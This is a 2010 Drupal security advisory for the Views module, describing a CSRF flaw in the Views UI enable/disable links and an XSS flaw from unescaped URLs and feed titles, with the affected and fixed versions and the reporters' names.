SA-CONTRIB-2010-067 - Views - Multiple vulnerabilities

By Drupal Security Team on 17 Jun 2010 at 02:59 UTC

Advisory ID: DRUPAL-SA-CONTRIB-2010-067
Project: Views (third-party module)
Version: 5.x, 6.x
Date: 2010-June-16
Security risk: Less critical
Exploitable from: Remote
Vulnerability: Multiple vulnerabilities

Description

The Views module provides a flexible method for Drupal site designers to control how lists and tables of content are presented.

Cross Site Request Forgery (CSRF)

The Views UI module, which is included with Views, can be used to enable/disable Views by following a link to a particular page (e.g. admin/build/views/disable/frontpage). As no protections, such as form tokens, are in place to prevent forged requests to these pages, the feature is vulnerable to a Cross Site Request Forgery (CSRF) that would allow an attacker to enable/disable all Views on a site.

Mitigating factors: If Views UI module is disabled Views will no longer be affected by this vulnerability.

This issue affects Views for Drupal 5 and Drupal 6.

Cross Site Scripting (XSS)

Under certain circumstances, Views could display URLs or aggregator feed titles without escaping, resulting in a Cross Site Scripting (XSS) vulnerability. An attacker could exploit this to gain full administrative access.

This issue affects Views for Drupal 6 only.

Versions affected

Views module for Drupal 5.x versions prior to 5.x-1.8
Views module for Drupal 6.x versions prior to 6.x-2.11

Drupal core is not affected. If you do not use the contributed Views module, there is nothing you need to do.

Solution

Install the latest version:

If you use the Views module for Drupal 5.x upgrade to Views 5.x-1.8
If you use the Views module for Drupal 6.x upgrade to Views 6.x-2.11

Reported by

The Cross Site Request Forgery (CSRF) vulnerability was reported by Martin Barbella (mbarbella).
The Cross Site Scripting (XSS) vulnerabilities were reported by Earl Miles (merlinofchaos), module maintainer and Daniel Wehner (dereine), module co-maintainer